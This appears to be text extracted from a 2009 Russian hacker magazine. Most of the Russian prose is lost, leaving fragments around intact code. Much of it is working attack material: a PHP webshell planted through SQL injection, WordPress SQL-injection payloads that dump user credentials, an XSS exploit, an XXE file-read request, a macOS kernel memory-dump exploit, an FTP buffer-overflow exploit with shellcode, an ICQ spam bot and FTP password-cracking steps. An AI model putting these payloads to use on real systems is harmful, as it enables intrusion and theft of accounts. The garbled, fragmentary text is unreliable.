LastName
Somov
Antipova
Timurov

FirstName Emp
Sum
Oleg
IT-Manager M0x8900f56543
Alexandra Director
4343Lax#dsdsss
Valeriy
Technical Dep. 0x2322322222

, .
, .
, . ,
. , ,
, , . ,
. : , , .
X 04 /124/ 09

>> pc_zone


- SQL 2005

?
XP_CRYPT (xpcrypt.com).
,
. ,
, ,
( ,
),

GUI-.

. , -

SQL Server ( , , ) WITH ENCRYPTION. ,


, . Microsoft. ,
! , , :
1) SQL Server GUID , ,
colid syscomments ( , 1 2)
;
2) SHA;
3)
RSA. ,
;
4)
XOR. , ctext
syscomments.
:
(GUID colid)
. , ,
dSQLSRVD. , GUID (
) ;
,
, (
). .
SQL Server? :
dSQLSRVD. ;
DECRYPT2K.
( ),
, Google.

XP_Crypt ,

-, -
( ,
!).
, .. ,
..
, SELECT * FROM
tbl_CCards, :
Username Password CredCardNum
james god
1234567890123456
lucas sex
2894787650102827
anna
love
3234563638716434

UDF (, User-Defined-Function,

)
SHA-:
CREATE FUNCTION ud_MakeSHA1
clearpass VARCHAR (8000) )
RETURNS VARCHAR (40)
AS
BEGIN
X 04 /124/ 09

(@

035

>> pc_zone

SysComments Decryptor ,


: MS SQL
, ,
SQL Shield

DECLARE @ret as VARCHAR(40)


EXEC master..xp_sha1 @clearpass,@
ret OUTPUT
RETURN @ret
END

: UPDATE tbl_CCards SET


password = dbo.ud_MakeSHA1(Password).
. ?
, ! ,

. ,
, :
CREATE FUNCTION ud_CheckUser (@
username
VARCHAR(16),@clear_pass

036

VARCHAR (16))
RETURNS INTEGER
AS BEGIN
DECLARE @res INTEGER
SELECT @res = count(*) FROM tbl_
CCards where username=@username AND
password=dbo.ud_MakeSHA1(@clear_
pass)
IF @res > 1 SELECT @res= 0
RETURN @res
END

:
SELECT
dbo.ud_CheckUser
('anna,'kolbaska')
>1 ()
SELECT
dbo.ud_CheckUser
('anna','love')
>0 (!)


. ,

- (
PCI; , ,
). XP_CRYPT

256- RSA.
- ( , , 768- ).

, .
,

, .
, ! z
X 04 /124/ 09

>>

Easy Hack}
R0ID

SKVOZ

PSYCHO.

/ R0ID@MAIL.RU /

/ KOMAROV@ITDEFENCE.RU /

/ X0WL.X0WL@GMAIL.COM /

: MYSQL
:
1. Web- , .
:
/templates_compiled/
/templates_c/
/templates/

: PHPMYADMIN
:
1. - PhpMyAdmin.
2. :

/temporary/
/images/
/cache/
/temp/
/files/

2. (, 4), :
UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3,4
INTO OUTFILE "/var/www/html/temp/c.php" --

3. http://victim.com/temp/c.php.

4. :
CREATE TABLE backdoor(
Stack TEXT
) TYPE=MYISaM;
INSERT INTO backdoor(Stack)
VALUES(
'<pre><body bgcolor=silver<? @system($_
REQUEST["v"]); ?></body></pre>')

CREATE DATABASE 'backdoor'

5.
3.
SELECT @@datadir
> C:\AppServ\MySQL\data\

: ,
:
, , ,
- . ,
online-flv.
, :
1. ru.savefrom.net. ,
.
2. . HTML-
.

038

SELECT * into dumpfile 'C:\AppServ\www\s.php' from


backdoor;

6. victim.com/s.php?v=.

3. URL .
4. ,
, . URL flv-.
exit();}
$file = fopen($file_uin,'r');
while (!feof($file)) {
$buffer = trim(fgets($file));
$icq->send_message($buffer, $message);
echo Message sent to $buffer \n;
flush();
sleep($pause);
}
$icq->disconnect();
X 04 /124/ 09

>>

4
: BIND 8 BIND 9, ,

:
Bind 9 ( 9.1.0) CHAOS- authors.

.
1. linux/freebsd
dig ns.example.com authors.bind chaos txt
2. windows/linux/freebsd
% nslookup -q=txt -class=CHAOS authors.bind. ns.example.com
Server: ns.example.com

:
:
, .
Malzilla (malzilla.sourceforge.net).
, unescape-

Address: 23.23.23.23
authors.bind text = Bob Halley
authors.bind text = Mark Andrews
authors.bind text = James Brister
authors.bind text = Michael Graff
authors.bind text = David Lawrence
authors.bind text = Michael Sawyer
authors.bind text = Brian Wellington
authors.bind text = Andreas Gustafsson

3. , !
, :
alert UDP $EXTERNAL any -> $INTERNAL 53 (msg: "IDS480/
named-probe-authors";
content: "|07|authors|04|bind; depth: 32; offset: 12;
nocase;)

UDP- 53 ,
, , .

, UCS2- JS . ,
:
1.
Download.
2. Send script to Decoder, Run script.
3. ( )
.
4. , Misc
decoders.
, malware- :
malwaredomainlist.com, zeustracker.abuse.ch.

! Malzilla .exe

X 04 /124/ 09

039

>>

: ICQ- PHP
:
ICQ- . ,
,
. , :
? ,
PHP. , ? ,
:
1.
WebIcqLite.class.php, DVD.
2.
include('WebIcqLite.class.php');

3. , Pashkela:
<?php
@set_time_limit(0);
@ini_set("display_errors","1");
ignore_user_abort(1);
include('WebIcqLite.class.php');
$ini = parse_ini_file("icq.ini");
$uin = $ini[uin];
// UIN
$pass = $ini[pass];
// UIN
$file_uin = $ini[file_uin]; // ,
$message = $ini[message];
//
$pause = $ini[pause];
//
define('UIN', $uin);
define('PASSWORD', $pass);
$icq = new WebIcqLite();
if(!$icq->connect(UIN, PASSWORD)) {

: PASSWORDPRO FTP-
:

PasswordPro.
:). ,
. ,
SQL- , MySQL-
PasswordPro. ,
, FTP.
,
PasswordPro admin:5ba686200919b19f:narym7
- ftp://admin:narym7@127.0.0.1. , :
1. , , Small
parser for passwordpro evil_packman DVD :). 2. PasswordPro first.txt, :

ICQ- PHP
echo $icq->error;
exit();
}
$file = fopen($file_uin,'r');
while (!feof($file)) {
$buffer = trim(fgets($file));
$icq->send_message($buffer, $message);
echo Message sent to $buffer \n;
flush();
sleep($pause);
}
$icq->disconnect();
exit();
?>

4. icq.ini :
uin = 123456 ; UIN,
pass = 1234 ; UIN,
file_uin = uin.txt ; UIN
message = test, do not reply this message, bot-test ;
,
pause = 2 ; ,
( )

5. uin.txt ,
.
, .
:).

web:5ba686200919b19f:nfgavr

2. , PHP.
( :)).
3. first.txt ( )
.
4. :
C:\php\php C:\parser.php first.txt out.txt 127.0.0.1,

first.txt PasswordPro, out.txt , 127.0.0.1 IP ftp-.


5. out.txt c:
PasswordPro

admin:5ba686200919b19f:narym7
news:5ba686200919b19f:wens6
root:5ba686200919b19f:sawbdv
swin:5ba686200919b19f:zasut4

040

X 04 /124/ 09

>>
ftp://admin:narym7@127.0.0.1
ftp://news:wens6@127.0.0.1
ftp://root:sawbdv@127.0.0.1
ftp://swin:zasut4@127.0.0.1

:
, Blind SQL-Injections
SQL-, . , .
,
, . Grey, - .
:
: version(), user(),
database(), mysql >= 3 .
, mysql >= 4.1 .
,
mysql >= 4.1 .
, mysql >= 4.1
.
, mysql >= 3 .
, -
, mysql >= 4.1 .
, information_schema.tables mysql => 5
.
, , information_schema.
columns mysql => 5 .
, information_schema.tables mysql => 5
.
;
, :
, ;
, .
PostgreSQL: version(),
current_user(), current_database().
PostgreSQL.

ftp://web:nfgavr@127.0.0.1

, -
FTP.


dic/grey_field_name.txt

3. (
) .
4. , config.php main.php.
5. config.php.
:
$host = ''; //
$port = ; //
$path = ''; // ( /)
$vars = ""; // ( ,
sql- ):
,
// , , , , ,

$strend = ''; // ('--+', '/*', '#'),



$method = ; // ():
// 0 POST; POST
// 1 GET; GET
// 2 GET/COOKIE; COOKIE
$type = ; // (0 1): sql-:
// 0
,

// 1
( ),

$text = ; // ,

6. http:////main.php.
7. 30 , -
.
8. result.txt.
! ,
, . z
Blind SQL-Injections

, :
1. DVD.
2. , :
main.php
config.php
lib_and_data/grey_data.php

lib_and_data/function.php
sql-
dic/grey_table_name.txt X 04 /124/ 09

041

>>

SKVOZ

01

WORDPRESS MU

>> Brief
Wordpress MU ,
( ). choose_primary_blog ( wp-includes/wpmu-functions.php).
.
1830 function choose_primary_blog() {
1831
global $current_user;
1832
?>
1833
<table class=form-table>
1834
<tr>
1835
<th scope=row><?php _e(Primary Blog); ?></th>
1836
<td>
1837
<?php

1838
$all_blogs = get_blogs_of_user( $current_
user->ID );
1839
if( count( $all_blogs ) > 1 ) {
...
1848
} else {
1849
echo $_SERVER[HTTP_HOST];
1850
}
1851
?>
1852
</td>
1853
</tr>
1854
</table>
1855
<?php
1856 }

1849 , ,
- , HTML/
JS-. HTTP- , WEB-
(WebScarab, Burpsuite).

042

X 04 /124/ 09

>> Targets:
Wordpress MU < 2.7
>> Exploit
$ curl -H "Cookie: " -H Host: <body
onload=alert(String.fromCharCode(88,83,83))>"
http://www.example.com/wp-admin/profile.php> tmp.html
$ firefox tmp.html

>> Solution
, ( ,
WordPress , . Forb).

APPLE MACOS X XNU <= 1228.X LOCAL KERNEL


MEMORY
DISCLOSURE
>> Brief
Apple MacOS
i386_set_ldt
i386_get_ldt .
, Intel-based . , ,
2005 FreeBSD
( , Unix- ). ,
MacOS. , : ( GDT), (
), .
(LDT) , . ,
LDT, GDT (
).
Pentium : LDT GDT.
i386_get_ldt , LDT (Local Descriptor Table) .
:
#include <machine/segments.h>
#include <machine/sysarch.h>
int i386_get_ldt (int start_sel, union descriptor
*descs, int num_sels);

,
.

>> Targets
Apple Mac OS X <10.5.6

>>

if (n < 0)
{
fprintf (stderr, "failed i386_get_ldt(): %d\n", n);
return (EXIT_FAILURE);
}
num_desc = n;
printf ("i386_get_ldt: num_desc: %d\n", num_desc);
fd = open (
TMP_FILE, O_CREAT | O_RDWR, S_IRUSR | S_IWUSR);
if (fd < 0)
{
fprintf (stderr, "failed open(): %d\n", fd);
return (EXIT_FAILURE);
}
// mmap
ptr = mmap (NULL, READ_SIZE, PROT_READ | PROT_WRITE,
MAP_ANON | MAP_PRIVATE, -1, 0);
if ((int) ptr == -1)
{
fprintf (stderr, "failed mmap()\n");
return (EXIT_FAILURE);
}
// ,
READ_SIZE ptr
memset (ptr, 0x00, READ_SIZE);
i386_get_ldt (num_desc 1,
(union ldt_entry *) ptr, -(num_desc 1));
//
n = write (fd, ptr, READ_SIZE);
munmap (ptr, READ_SIZE);
close (fd);
printf ("%d-bytes of kernel memory dumped to: %s\n",
n, TMP_FILE);
return (EXIT_SUCCESS);
}

>> Solution
.

02

FULL DISCLOSURE

FTP-.

>> Brief
, fuzzing FTP-.
win32_exec payloada -
, ,

>> Exploit
http://milw0rm.com/exploits/8108
:
#define TMP_FILE "/tmp/xnu-get_ldt"
#define READ_SIZE 0x2000000
int
main (int argc, char **argv)
{
int fd, n, num_desc;
void *ptr;
n = i386_get_ldt (0, ((int)NULL) + 1, 0);
X 04 /124/ 09

043

>>

calc.exe

: ,
.
, FTP-
. ,
( )
,
.
, ,
Infigo FTP Fuzz (infigo.hr/files/ftpfuzz.zip). , .
anonymous-, -
. ,

(OllyDbg).
Olly. , . FaultMon (research.eeye.com/html/tools/RT20060801-4.
html) .
OllyDbg -P ( PID ).
FaultMon.
Golden FTPd. .
Olly,
Debug > Restart. -
USER , EIP 41414141.
, 3000 .
-
. OllyDbg: Overflow
Return Address ASCII Overflow returns Search JMP/Call ESP.
, View Log, jmp esp, call esp DLL.
View Executable Modules OpCodeDB Metasploit
: 0x750362c3 ws2_32.dll (opcode
pop,pop.ret). , pop,pop.ret.
, ,
pop (0x750362c4).
- win32_exec Metasploit (payloads):

EIP

"\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
"\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
"\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
"\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
"\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
"\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4"

# (3000 bytes)
sc = 'A' * 3000
# calc.exe Shellcode(172 bytes)

sc += "\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
sc += "\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
sc += "\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
sc += "\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
sc += "\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"
sc += "\x33\x44\xf9\xe8\x93\xa9\x2d\xf8\xd9\xc9\xf9\xf8\x53\x23\x99\x6d"
sc += "\x84\x06\x76\x27\xe9\xe2\x16\x6f\x98\x12\xf7\x24\xa0\x2d\xf9\xa4"
sc += "\xd4\xa9\x02\xf8\x75\xa9\x1a\xec\x31\x29\x72\xe4\xd8\xa9\x32\xd0"
sc += "\xdd\x5e\x72\xe4\xd8\xa9\x1a\xd8\x87\x13\x84\x84\x8e\xc9\x7f\x8c"
sc += "\x28\xa8\x76\xbb\xb0\xba\x8c\x6e\xd6\x75\x8d\x03\x30\xcc\x8d\x1b"
sc += "\x27\x41\x13\x88\xbb\x0c\x17\x9c\xbd\x22\x72\xe4"

# Windows 2000 SP0,1,2,3,4 (pop,pop,ret+1)= (pop,ret)


# Thanks Metasploit!

return_address='\xC5\x2A\x02\x75
buffer = '\xEB\x30' + ' /' + sc + return_address + '\r\n\r\n'
print buffer

!
calc.exe
.
.
antiparser (antiparser.
sourceforge.net) API, Python
.
?

"\x31\xc9\x83\xe9\xdb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd8"
"\x22\x72\xe4\x83\xeb\xfc\xe2\xf4\x24\xca\x34\xe4\xd8\x22\xf9\xa1"
"\xe4\xa9\x0e\xe1\xa0\x23\x9d\x6f\x97\x3a\xf9\xbb\xf8\x23\x99\x07"
"\xf6\x6b\xf9\xd0\x53\x23\x9c\xd5\x18\xbb\xde\x60\x18\x56\x75\x25"
"\x12\x2f\x73\x26\x33\xd6\x49\xb0\xfc\x26\x07\x07\x53\x7d\x56\xe5"

044

apChar()
apCString() ( ),

apKeywords() ,
X 04 /124/ 09

>>

FTP-


apLong() 32-
apShort() 16-
apString() (aka free form
string)

apKeywords(). , : [ (, FTP)]
[][ ( )][
]. FTP :
#
From antiparser import *
#

CMDLIST = ['ABOR', ALLO', 'APPE', 'CDUP', 'XCUP',


'CWD', 'XCWD', 'DELE', 'HELP', 'LIST', 'MKD', 'XMKD',
'MACB, 'MODE', 'MTMD', 'NLST', 'NOOP', 'PASS', PASV',
'PORT', 'PWD', 'XPWD', 'QUIT', 'REIN', 'RETR', 'RMD',
'XRMD', 'REST', 'RNFR', 'RNTO', 'SITE', 'SIZE', 'STAT,
'STOR', 'STRU', 'STOU', 'SYST', 'TYPE', 'USER']
#
SEPARATOR = ""
TERMINATOR = "\r\n"
for cmd in CMDLIST:
# API
Ap = antiparser()
#
cmdkw = apKeywords()
# ,
cmdkw.setKeywords([cmd])
cmdkw.setSeparator(SEPARATOR)
cmdkw.setTerminator(TERMINATOR)
# ,
X 04 /124/ 09

Metasploit

cmdkw.setContent(r%n%n%n%n%n%n%n%n%n%n%n%)
# , 65536
cmdkw.setMode('incremental')
cmdkw.setMaxSize(65536)

045

>>

03

NEXTAPP
ECHO XML
INJECTION

>> Brief:
. : XML-, ,
XML-.
:

, Http-Analyzer Mozilla
Tamper Data,

ap.append(cmdkw)
#

sock = apSocket()
sock.connect(HOST, PORT)
print sock.recv(1024)
sock.sendTCP(ap.getPayload())
print sock.recv(1024)
sock.close

.
CWD/CDUP. Access violation
, ,
( Read of).
(Write to) , ,
.
OllyDbg (Options Debugging
Options Exceptions) Memory Access Violation, Single Step Break.

>> Targets
:
WinFTP 2.3.0
LIST (LIST *<>). arbitary- (http://milw0rm.com/exploits/7875).
GuildFTPd FTP Server Version 0.x.x
DELETE (http://milw0rm.
com/exploits/8200).
directory traversal ( \..).
WFTPD Explorer Pro 1.0
(http://milw0rm.com/exploits/7913).
Serv-U 7.4.0.1
(http://
milw0rm.com/exploits/8211).
, ,

. , , . ( 2000) SMNT

.

46
046

<client-message xmlns=http://www.nextapp.
com/products/echo2/climsg trans-id=3
focus=c_25><message-part xmlns= processor=E
choPropertyUpdate><property component-id=c_25
name=text>aa</property><property componentid=c_25 name=horizontalScroll value=0/><property
component-id=c_25 name=verticalScroll
value=0/></message-part><message-part xmlns=
processor=EchoAction><action component-id=c_25
name=action/></message-part></client-message>

:
<?xml version=1.0?><!DOCTYPE sec [<!ELEMENT sec
ANY><!ENTITY mytestentity SYSTEM "file:///c:\boot.
ini">]>

, XML . , ,
, boot.ini, XML-.

>> Targets
NextApp Echo < 2.1.1
>> Exploits
http://milw0rm.com/exploits/8191
, XML-requesta
JS/HTTP-POST.

04

FTS_*
LIBC (HTTP://MILW0RM.COM/
EXPLOITS/8163).


. fts
UNIX ftp_open()
,
:
fts_read ,
;
fts_children() ,
.
, :

typedef struct _ftsent {


unsigned short fts_info; /* FTSENT-*/
char *fts_accpath; /* */
char *fts_path; /* */
size_t fts_pathlen; /* strlen(fts_path) */
char *fts_name; /* */
size_t fts_namelen; /* strlen(fts_name) */
short fts_level; /* (-1 N) */
X 04 /124/ 09

>>

int fts_errno; /* */
long fts_number; /* */
void *fts_pointer; /* */
struct _ftsent *fts_parent; /* */
struct _ftsent *fts_link; /*
*/
struct _ftsent *fts_cycle; /*
*/
struct stat *fts_statp; /*
*/
} FTSENT;

, fts_level short. . :
- ---line-616-625--/*
* Figure out the max file name length that can
be stored in the
* current path -- the inner loop allocates
more path as necessary.
* We really wouldnt have to do the maxlen
calculations here, we
* could do them in fts_read before returning
the path, but its a
* lot easier here since the length is part of
the dirent structure.
*
* If not changing directories set a pointer so
that can just append
* each new name into the path.
*/
- ---line-616-625---

, - ...
pathlen-. , ,
? , , .
#define NAPPEND(p)\
(p->fts_path[p->fts_pathlen 1] == / \
? p->fts_pathlen 1 : p->fts_pathlen)

, , .
127# pwd
/home/cxib
#
127# du /home/
4
/home/cxib/.ssh
Segmentation fault (core dumped)
127# rm -rf Samotnosc
Segmentation fault (core dumped)
127# chmod -R 000 Samotnosc
Segmentation fault (core dumped)

>> Targets
OpenBSD 4.4 (/usr/src/lib/libc/gen/fts.c)
Microsoft Interix 6.0 10.0.6030.0 x86
Microsft Vista Enterprise (SearchIndexer.exe) z
X 04 /124/ 09

47

>>
Secunia

BID

OSVDB

SKVZ
/ KOMAROV@ITDEFENCE.RU /

ISS X-Force

,
,
. , ,
. ,

>>

? .


.
.
,
.
CVE,
NCSD (National Cyber
Security Division)
. .

VE (COMMON VULNERABILITIES AND


EXPOSURES)
, CVE ,
, ,
, Bugtrack-. CVE
(NVD nvd.nist.gov) (cve.mitre.org/data/downloads).
,

048

: xml, html, csf, xsd schema. -


,
CVE
( ,
).
CVE :
CVE ID, Reference Description.

ID , CVE-1999-03.
Reference
,
.
Description . , CVE
, ,
WEB-.
,
-

:
(, ),
, .
?
()
. -,
,

.

. MITRE Corporation (mitre.org) , ,
.
,
.
. ,

X 04 /124/ 09

>>
BID

OSVDB

Secunia


. $5000 .

BID
Securityfocus (
securityfocus.com/vulnerabilities).
BID CVE. ,
BID CVE ,
, .

, ,
..
,
, , ,
BID
.
OSVDB
:
.
.
.

. :
( / ) ( ,
-
).
SECUNIA
,
secunia.com,

.
, - ,
,

.

, . CVSS v.2
: ,
.
.

ISS X-FORCE
ISS , -,
,
. , Microsoft Excel Remote
Code Execution,
,
,

.
,
security- Perimetrix
(securitylab.ru/blog/company/Perimetrix_blog).

.

CVSS 2.
,
.

.


CVSS Base Score =
9.2. ?
:


. .
undercover vulnerabilities , . ,
(securitymetrics.org/content/Wiki.
jsp), ,
.
.

X 04 /124/ 09

BaseScore = round_to_1_decimal(((
0.6*Impact)+(0.4*Exploitability)1.5)*f(Impact))

.
first.org/cvss.
, .
: AV:N/
AC:L/Au:N/C:N/I:N/A:C.
, !
. , .
Access Vector: Network
.
,
.



. , ,
, ,
.
, ,
. ,
-
.
,
. ,
,
-. .

049

>>
Secunia

Base Score Microsoft Windows


Kernel GDI

. CVE

info

Unix
Known Problem
List, Internal Sun
Microsystems Bug
List,

CERT
.

BID

.
.
RPC.
Access Complexity: Low :
.
, ,
.
Authentication: None . , ,
-
(-, , ),
.
Confidentiality Impact: None
. Integrity Impact: None .
.
,
, C () P (, partial).
Availability Impact: Complete , ,
, .
, Availability Impact Complete.



. ,
.
.
? ,

050

. ,
, ( ,
, ).
,
.
? , , .
? .
.
Exploitability (E) . ,
.
(, , ),
. ,
. : U ( ), Proof-of-Concept (POC
), F (,
), H (high risk ,

), ND ( ,
,
). Remediation Level (RL) .
,
? ,
(, ),


.
Report Confidence (RC) .
!
X 04 /124/ 09

>>
BID

OSVDB

Secunia

osvdb.org.
,


CVSS

:
.
,
.

?
Report Confidence.
//.




. ,

. Collateral Damage Potential (CDP)
.
. , , DoS-.

, CVSS (2).
, , .
, . Base Score NVD

,
, .

- ( ).
Target Distribution (TD) .
,

? ,
,
, .



-
. -, , -
. ,
(NERC-CIP,



CVE: ISS, BID, Secunia, SecurityTracker, OSVDB
BID: CVE, Bugtraq, ISS, Secunia, SecurityTracker, OSVDB
ISS: CVE, BID, Secunia, SecurityTracker, OSVDB
Secunia: CVE, OSVDB
SecurityTracker: CVE, OSVDB, Nessus
Nessus: CVE, BID, OSVDB
OSVDB: CVE, BID, Secunia, SecurityTracker, ISS, Nessus, Snort

X 04 /124/ 09

PCI, FISMA, GLBA HIPAA)


, ,
. , AirMagnet,
ISS
Security Scanner.
ID. Nessus,
.



, Common
Criteria Web Application Security Scoring
(CCWAPSS) 1.1. ,
, ,
.
?
, . ,

, . ,
,
,
,

. z

051

>>

SKVZ
/ KOMAROV@ITDEFENCE.RU /

WordPress:

WorldPress , ( Powered by WordPress 74 400 000


!). , . : 5-
, , , seo-friendly
.

>>

?
][
WordPress.
.
, - SQL-
2.2.2 28 2007 Alexander
Concha ( ).
, ,
advisory .
. , 2.3.3 ,
XSS- html kses ( , , ). ,
: ,
, .
Charset
Remote SQL Injection ( <=2.3.3), -. ?
MySQL GBK BIG5.
.

052

WordPress <=2.3.2 xmlrpc.php Post


Edit Unauthorized Access Vulnerability ( FAQ United),
subscriber . , draft, . , .
2.3.x , WordPress cat
Parameter Directory Traversal Vulnerability, FAQ. ,
, Windows-.
SQL Column
Truncation (Admin Takeover),
.
, ,
rainbow 40 80 (, 2-4 ), ,
.
? . , .
, ,
.
X 04 /124/ 09

>>

WORDPRESS COMMENTS HTML SPAM VULNERABILITY


,
WordPress Comments Html Spam Vulnerability.
, 1.5
( ) 2.7.1.
. ./wp-includes/
comment.php :
function check_comment($author, $email, $url, $comment,
$user_ip, $user_agent, $comment_type) {
...
if ( 'trackback' == $comment_type || 'pingback' ==
$comment_type ) { // check if domain is in blogroll
$uri = parse_url($url);
$domain = $uri['host'];
$uri = parse_url( get_option('home') );
$home_domain = $uri['host'];
if ( $wpdb->get_var($wpdb->prepare("SELECT
link_id FROM $wpdb->links WHERE link_url LIKE (%s) LIMIT
1", '%'.$domain.'%')) || $domain == $home_domain )
return true;
else
return false;
}
...
}

?
1. URL , parse_url ( , Trackback,
).
2. (
), check_comment() true.
3. check_comment(),
.
.
. WordPress
- , parse_url.
http://www.php.net/parse_url: This function is not meant to
validate the given URL.
, parse_url()
! -
http://%/suck_wordpress, $uri[host]
%.
, , evil- sql-,
:
"SELECT link_id FROM wp_links WHERE link_url LIKE %%%
LIMIT 1"

true, - :).
! ./wptrackback.php, ($excerpt)
:
function wp_html_excerpt( $str, $count ) {
$str = strip_tags( $str );
X 04 /124/ 09

$str = mb_strcut( $str, 0, $count );


// remove part of an entity at the end
$str = preg_replace( '/&[^;\s]{0,6}$/, '', $str );
return $str;
}

, . :
1. strip_tags() <br/> ( ,
);
2. kses- html-,
.
, :
<html>
<form action="http://lamer.com/wp/wp-trackback.
php?p=[ID_]" method="post">
: <input name=title value="commenter"/><br/>
URL:<input name="url" value="http://%/la.com"/><br/>
Comment:<input name="excerpt" value=""/><br/>
<input name="blog_name" value=Blog" /><br/>
<input type="submit" value="ok"/>
</form>
</html>

Comment :
< b >< a href="http"//ya.ru"> < / a >< / b >

,
. :
SEO Yahoo, , MSN,
rel=nofollow,
.

RSS- DASHBOARD

WordPress, RSS- . , Dashboard : , incoming links, devblog c wordpress.
org WordPress. 2.5,
Edit,
, .
,
( ). .
,
security- (
) . (, )
. - html-
- :
<form action="http://lamer.com/wp265/wp-admin/"
method="post">
<input name="widget-rss[1][url]" type="text"
value="http://___evilrss.com/feed.xml" />
<input name="widget-rss[1][title]" type="text"

053

>>

Opera
admin takeover

links
wordpress.org/
download/releasearchive/
WordPress.
milw0rm.com/
exploits/4721
Charset Remote
SQL Injection
Vulnerability.
buayacorp.com/
files/wordpress/
wordpress-sqlinjection-advisory.
html Remote
SQL Injection in
WordPress and
WordPress MU.
securityfocus.
com/bid/27669
WordPress
'xmlrpc.php' Post
Edit Unauthorized
Access Vulnerability.
securityfocus.
com/bid/28845
WordPress
'cat' Parameter
Directory Traversal
Vulnerability.

create_function

value=" " />


<input name="widget-rss[1][items]"
value=" " />
<input name="widget-rss[1][show_summary]"
type="checkbox" value="1" checked="checked"/>
<input name="widget-rss[1][show_author]"
type="checkbox value="1" />
<input name="widget-rss[1][show_date]"
type="checkbox" value="1" checked="checked"/>
<input type="hidden" name="widget-rss[1]
[submit]" value="1" />
<input type='hidden' name='sidebar'
value='wp_dashboard' />
<input type='hidden' name='widget_id'
value='dashboard_primary' />
<input type='submit' value='Save' />
</form>

,
evil-rss :).
, :
1. ;
2. 2.5 2.6.5 .

. 1
,
WordPress Pingback
Trackback. , , , 2 (!) sql 2.5.1
author/editor (WordPress MU also affected).

2.3.3. ./wp-includes/post.php :
function add_ping($post_id, $uri) {
// Add a URL to those already pung
global $wpdb;
$pung = $wpdb->get_var("SELECT pinged FROM

054

$wpdb->posts WHERE ID = $post_id");


$pung = trim($pung);
$pung = preg_split('/\s/', $pung);
$pung[] = $uri;
$new = implode("\n", $pung);
$new = apply_filters('add_ping', $new);
return $wpdb->query("UPDATE $wpdb->posts
SET pinged = '$new' WHERE ID = $post_id");
}

, add_ping
.
,
- !
.
:). ,
:
1. . :
<a href="http://_/?p=[_
]">pingme</a>

(, http://lamer/
wp1/?p=2).
2. 2.3.x-2.5.1 , Send trackbacks to: :
test',post_title=(select/**/concat(user_
login,':',user_pass)/**/from/**/wp_users/**/
where/**/id=1),post_content_filtered =blah

.
,
html-
:
X 04 /124/ 09

>>

Parse_str sql-

WordPress

<a href="http://lamer/wp1/?p=2">pingme</a>

! ,


SQL-,
,
2.3.X
2.7.1.
.

. 2
SQL-
. ./wp-includes/comment.php :
function do_trackbacks($post_id) {
...
$to_ping = get_to_ping($post_id);
...
if ( $to_ping ) {
foreach ( (array) $to_ping as $tb_ping ) {
$tb_ping = trim($tb_ping);
if ( !in_array($tb_ping, $pinged) ) {
trackback($tb_ping, $post_title,
$excerpt, $post_id); $pinged[] = $tb_ping;
} else {
$wpdb->query(UPDATE $wpdb->posts SET to_
ping = TRIM(REPLACE(to_ping, '$tb_ping', '')) WHERE ID =
'$post_id'");
}
}
}
}
X 04 /124/ 09

: $to_ping - .
SQL- .
1. Send trackbacks to: :
test','')),post_title=(select/**/concat(user_
login,':',user_pass)/**/from/**/wp_users/**/where/**/
id=1),post_content_filtered=TRIM(REPLACE(to_ping,'blah

2. ,
;
3. .
PARSE_STR
SQL-, , 2.3.x
2.7.1.
manage_links. WordPress 2.3.3. , ./wp-admin/link-manager.php.
:
get_bookmarks( "category=$cat_id&hide_invisible=0&orde
rby=$sqlorderby&hide_empty=0" );

, :
./wp-includes/bookmark.php
function get_bookmarks($args = '') {
...
$r = wp_parse_args( $args, $defaults );
extract( $r, EXTR_SKIP );
...
if ( ! empty($category_name) ) {
if ( $category = get_term_by('name',
$category_name, 'link_category') )
$category = $category->term_id;
}
...
./wp-includes/formatting.php
function wp_parse_args( $args, $defaults = '' ) {
if ( is_object($args) )
$r = get_object_vars($args);
else if ( is_array( $args ) )
$r =& $args;
else
wp_parse_str( $args, $r );
if ( is_array( $defaults ) )
return array_merge( $defaults, $r );
else
return $r;
}

055

>>

Pingback sql-

Magic SEO Toolz WordPress

function wp_parse_str( $string, &$array ) {


parse_str( $string, $array );
if ( get_magic_quotes_gpc() )
$array = stripslashes_deep( $array );
$array = apply_filters( 'wp_parse_str', $array );
}
./wp-includes/taxonomy.php
function get_term_by($field, $value, $taxonomy, $output
= OBJECT, $filter = 'raw') {
...
} else if ( 'name' == $field ) {
// Assume already escaped
$field = 't.name';
...
$term = $wpdb->get_row("SELECT t.*, tt.* FROM
$wpdb->terms AS t INNER JOIN $wpdb->term_taxonomy
AS tt ON t.term_id = tt.term_id WHERE tt.taxonomy =
'$taxonomy' AND $field = '$value' LIMIT 1");

WordPress , :
1. parse_str urldecode, , - ( wp_parse_str stripslashes);
2. get_bookmarks()
parse_str (%26 urlencode).
, , blind sql-:
http://lamer.com/wp233/wp-admin/link-manager.php?cat_
id=all%26category_name=0%2527+union+select+1,2,3,4,5,
6,7,8,9,10+from+wp_users+where+1=1/*&order_by=order_
url&action=Update+%C2%BB

:
) 1=1 ;
) 1=2 .

056

WORDPRESS 2.5 COOKIE INTEGRITY


PROTECTION VULNERABILITY
, , Cookie Integrity Protection
Vulnerability. WordPress 2.5. advisory
, , . : 2.5, WordPress
,
. :
"wordpress_".COOKIEHASH = USERNAME . "|" . EXPIRY_TIME .
"|" . MAC

:
COOKIEHASH md5- URL , ;
USERNAME ;
EXPIRY_TIME ;
MAC HMAC-,
,
. , ,
.
, :
1. admin99;
2. ;
3. ( :
cookies) :
:
wordpress_[] = admin99||MAC
:
